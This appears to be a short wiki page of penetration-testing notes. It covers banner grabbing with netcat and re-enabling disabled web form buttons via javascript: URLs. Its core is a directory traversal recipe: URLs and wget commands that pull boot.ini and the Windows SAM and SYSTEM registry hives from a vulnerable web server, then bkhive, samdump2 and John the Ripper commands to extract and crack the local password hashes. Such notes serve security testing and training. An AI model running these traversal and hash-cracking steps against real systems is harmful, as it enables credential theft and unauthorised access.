Web

Command Line Stuff

A simple way to pull the header from a Web Server, using netcat or telnet.

$ nc 192.168.120.103 80
HEAD / HTTP/1.0

The server's response should be something like:

HTTP/1.1 200 OK
Date: Wed, 13 May 2009 14:14:53 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
Last-Modified: Tue, 12 May 2009 10:13:12 GMT
ETag: "76032-2d-469b457a05e00"
Accept-Ranges: bytes
Content-Length: 45
Connection: close
Content-Type: text/html

Directory Traversal

Pulling Hashes via Web Server

This example will retrieve the C:\boot.ini file.

http://XX.XX.XX.XX:<port>/../../../../../../boot.ini

This example will retrieve a copy of the target system's SAM registry hive from the Windows repair folder:

http://XX.XX.XX.XX:<port>/../../../../../../windows/repair/sam

With the SAM and SYSTEM registry hives, it is possible to extract the system's local password hashes for offline cracking. The tools needed to extract the hashes from these files are bkhive, samdump2, and John the Ripper. These tools can be found on our BackTrack testing image.

$ wget -q http://XX.XX.XX.XX:<port>/../../../../../../windows/repair/sam
$ wget -q http://XX.XX.XX.XX:<port>/../../../../../../windows/repair/system.bak
$ bkhive system keyfile
$ samdump2 sam keyfile > hashes
$ john --wordlist=all hashes

Javascript Void(0)

You can use the following examples to enable/disable buttons that have been disabled in the HTML source. Obviously, you have to adjust the JavaScript to fit your specific case.

javascript:document.accrual.elements['Add'].disabled=false;void(0);
javascript:document.chartField.elements['Update'].disabled=false;void(0);

Here's how it should break down:

javascript:document.FormName.elements['Name of Form Element'].disabled=true/false;void(0);

The void(0) is what allows you to execute the JavaScript without refreshing the page.

Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-Share Alike 2.5 License.